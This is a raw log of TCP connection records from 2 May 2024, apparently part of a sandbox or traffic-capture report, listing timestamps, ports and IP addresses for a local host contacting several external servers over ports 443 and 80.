May 2, 2024 15:07:12.706794024 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:13.833168030 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:13.833179951 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:26.649607897 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.649648905 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:26.649749041 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.666707039 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.666721106 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:26.858855009 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:26.858937979 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.906327963 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.906354904 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:26.906658888 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:26.906737089 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.912019968 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:26.956121922 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242522955 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242561102 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242592096 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242609024 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242619038 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242647886 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242655993 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242695093 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242702007 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242733002 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242873907 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242924929 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.242985010 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242985010 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.242995024 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243026018 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243031979 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243063927 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243067026 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243079901 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243108988 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243134975 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243344069 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243388891 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243393898 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243427992 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243432999 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.243468046 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.243963957 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244026899 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244034052 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244071007 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244083881 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244117975 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244262934 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244303942 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244311094 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244348049 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244419098 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244467020 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244631052 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244677067 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.244740963 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.244785070 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245017052 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245059013 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245160103 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245203018 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245209932 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245249987 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245313883 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245357990 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245364904 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245404959 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245471001 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245512009 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245635033 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245682955 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245691061 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245739937 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.245771885 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.245815039 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.246474028 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.246520042 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.246611118 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.246655941 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.246762037 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.246803045 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.247062922 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.247109890 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.247155905 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.247196913 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.247204065 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.247243881 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.247490883 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.247544050 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.247550964 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.247589111 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.247869968 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.247912884 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.248188019 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.248233080 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.248240948 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.248279095 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.248505116 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.248553991 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.330395937 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.330502033 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.330547094 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.330563068 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.330693007 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.331593037 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.331631899 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.331691027 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.331697941 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.331764936 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.331830025 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.332020998 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.332115889 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.332153082 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.332237959 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.332685947 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.332777023 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.332781076 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.332802057 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.332851887 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.332864046 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.332941055 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.332946062 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.333022118 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.333568096 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.333668947 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.334569931 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.334667921 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.334786892 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.334877014 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.335835934 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.335901022 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.335918903 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.335979939 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.336304903 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.336349964 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.336363077 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.336369991 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.336384058 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.336393118 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.336422920 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.336426973 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.336451054 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.336482048 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.417335987 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.417403936 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.417880058 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.417965889 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.418518066 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.418582916 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.419287920 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.419338942 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.419363022 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.419378996 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.419394970 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.419404030 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.419419050 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.419425011 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.419456005 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.419487000 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.419900894 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.419971943 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.420061111 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.420135021 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.420865059 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.420936108 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.421288967 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.421344042 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.421477079 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.421539068 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.422713995 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.422821045 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.422890902 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.422950029 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.423074007 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.423124075 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.423618078 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.423655987 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.423676968 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.423685074 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.423726082 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.423727036 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.423818111 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.423882961 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.424086094 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.424175024 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.424685955 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.424741030 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.424875975 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.424928904 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.425590038 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.425638914 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.426702976 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.426743984 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.426775932 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.426786900 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.426796913 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.426816940 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.428294897 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.428371906 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.428602934 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.428658962 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.429980040 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.430002928 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.430042028 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.430047989 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.430063963 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.430085897 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.430974007 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.431031942 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.431035042 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.431080103 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.431262970 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.431274891 CEST	443	49755	104.21.31.110	192.168.2.4
May 2, 2024 15:07:27.431308985 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:07:27.434217930 CEST	49755	443	192.168.2.4	104.21.31.110
May 2, 2024 15:08:02.571800947 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:02.571841955 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:02.572216988 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:02.572467089 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:02.572480917 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:02.757805109 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:02.758488894 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:02.758505106 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:02.758795977 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:02.762569904 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:02.762640953 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:02.940933943 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:10.807145119 CEST	49758	80	192.168.2.4	3.33.130.190
May 2, 2024 15:08:10.894671917 CEST	80	49758	3.33.130.190	192.168.2.4
May 2, 2024 15:08:10.894763947 CEST	49758	80	192.168.2.4	3.33.130.190
May 2, 2024 15:08:10.897602081 CEST	49758	80	192.168.2.4	3.33.130.190
May 2, 2024 15:08:10.985450029 CEST	80	49758	3.33.130.190	192.168.2.4
May 2, 2024 15:08:10.994473934 CEST	80	49758	3.33.130.190	192.168.2.4
May 2, 2024 15:08:10.994602919 CEST	80	49758	3.33.130.190	192.168.2.4
May 2, 2024 15:08:10.994719028 CEST	49758	80	192.168.2.4	3.33.130.190
May 2, 2024 15:08:11.000277996 CEST	80	49758	3.33.130.190	192.168.2.4
May 2, 2024 15:08:11.000319958 CEST	49758	80	192.168.2.4	3.33.130.190
May 2, 2024 15:08:11.001997948 CEST	49758	80	192.168.2.4	3.33.130.190
May 2, 2024 15:08:11.089310884 CEST	80	49758	3.33.130.190	192.168.2.4
May 2, 2024 15:08:12.764174938 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:12.764246941 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:12.764306068 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:13.238312006 CEST	49757	443	192.168.2.4	142.251.32.100
May 2, 2024 15:08:13.238338947 CEST	443	49757	142.251.32.100	192.168.2.4
May 2, 2024 15:08:34.592814922 CEST	49759	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:34.754633904 CEST	80	49759	213.171.195.105	192.168.2.4
May 2, 2024 15:08:34.754750967 CEST	49759	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:34.757334948 CEST	49759	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:34.919146061 CEST	80	49759	213.171.195.105	192.168.2.4
May 2, 2024 15:08:34.919249058 CEST	80	49759	213.171.195.105	192.168.2.4
May 2, 2024 15:08:34.919262886 CEST	80	49759	213.171.195.105	192.168.2.4
May 2, 2024 15:08:34.919336081 CEST	49759	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:36.793872118 CEST	49759	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:37.854595900 CEST	49760	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:38.014887094 CEST	80	49760	213.171.195.105	192.168.2.4
May 2, 2024 15:08:38.014997005 CEST	49760	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:38.016860008 CEST	49760	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:38.176984072 CEST	80	49760	213.171.195.105	192.168.2.4
May 2, 2024 15:08:38.177081108 CEST	80	49760	213.171.195.105	192.168.2.4
May 2, 2024 15:08:38.177093983 CEST	80	49760	213.171.195.105	192.168.2.4
May 2, 2024 15:08:38.177130938 CEST	49760	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:39.533041000 CEST	49760	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:40.970776081 CEST	49761	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:41.133079052 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:41.133207083 CEST	49761	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:41.135170937 CEST	49761	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:41.297177076 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:41.297219992 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:41.297441959 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:41.297486067 CEST	49761	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:41.297517061 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:41.297563076 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:41.297605038 CEST	49761	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:41.335094929 CEST	49761	80	192.168.2.4	213.171.195.105
May 2, 2024 15:08:41.497065067 CEST	80	49761	213.171.195.105	192.168.2.4
May 2, 2024 15:08:46.479130983 CEST	49762	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:46.654330969 CEST	80	49762	91.195.240.19	192.168.2.4
May 2, 2024 15:08:46.654503107 CEST	49762	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:46.656414986 CEST	49762	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:46.837913036 CEST	80	49762	91.195.240.19	192.168.2.4
May 2, 2024 15:08:46.837951899 CEST	80	49762	91.195.240.19	192.168.2.4
May 2, 2024 15:08:46.838027954 CEST	49762	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:48.158396006 CEST	49762	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:49.195194960 CEST	49763	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:49.370959044 CEST	80	49763	91.195.240.19	192.168.2.4
May 2, 2024 15:08:49.371043921 CEST	49763	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:49.372937918 CEST	49763	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:49.549385071 CEST	80	49763	91.195.240.19	192.168.2.4
May 2, 2024 15:08:49.549434900 CEST	80	49763	91.195.240.19	192.168.2.4
May 2, 2024 15:08:49.549613953 CEST	49763	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:50.880273104 CEST	49763	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:51.898689032 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.073753119 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.074049950 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.075913906 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.292228937 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546307087 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546358109 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546432018 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546498060 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.546516895 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546530008 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546576023 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.546590090 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546606064 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546629906 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.546657085 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546698093 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.546740055 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546946049 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.546989918 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.722687960 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.722743034 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.722822905 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.722836018 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.722836971 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.722907066 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.723289967 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.726933002 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.727026939 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.727204084 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.727319002 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.727332115 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.727402925 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.727408886 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:52.727639914 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.730153084 CEST	49764	80	192.168.2.4	91.195.240.19
May 2, 2024 15:08:52.905489922 CEST	80	49764	91.195.240.19	192.168.2.4
May 2, 2024 15:08:58.904524088 CEST	49765	80	192.168.2.4	47.76.136.160
May 2, 2024 15:08:59.219499111 CEST	80	49765	47.76.136.160	192.168.2.4
May 2, 2024 15:08:59.219712973 CEST	49765	80	192.168.2.4	47.76.136.160
May 2, 2024 15:08:59.221474886 CEST	49765	80	192.168.2.4	47.76.136.160
May 2, 2024 15:08:59.533435106 CEST	80	49765	47.76.136.160	192.168.2.4
May 2, 2024 15:08:59.536159039 CEST	80	49765	47.76.136.160	192.168.2.4
May 2, 2024 15:08:59.536173105 CEST	80	49765	47.76.136.160	192.168.2.4
May 2, 2024 15:08:59.536236048 CEST	49765	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:00.735342026 CEST	49765	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:01.753591061 CEST	49766	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:02.062185049 CEST	80	49766	47.76.136.160	192.168.2.4
May 2, 2024 15:09:02.062330008 CEST	49766	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:02.064500093 CEST	49766	80	192.168.2.4	47.76.136.160
May 2, 2024 15:09:02.380985022 CEST	80	49766	47.76.136.160	192.168.2.4
May 2, 2024 15:09:02.383344889 CEST	80	49766	47.76.136.160	192.168.2.4
May 2, 2024 15:09:02.383358955 CEST	80	49766	47.76.136.160	192.168.2.4
May 2, 2024 15:09:02.383404016 CEST	49766	80	192.168.2.4	47.76.136.160
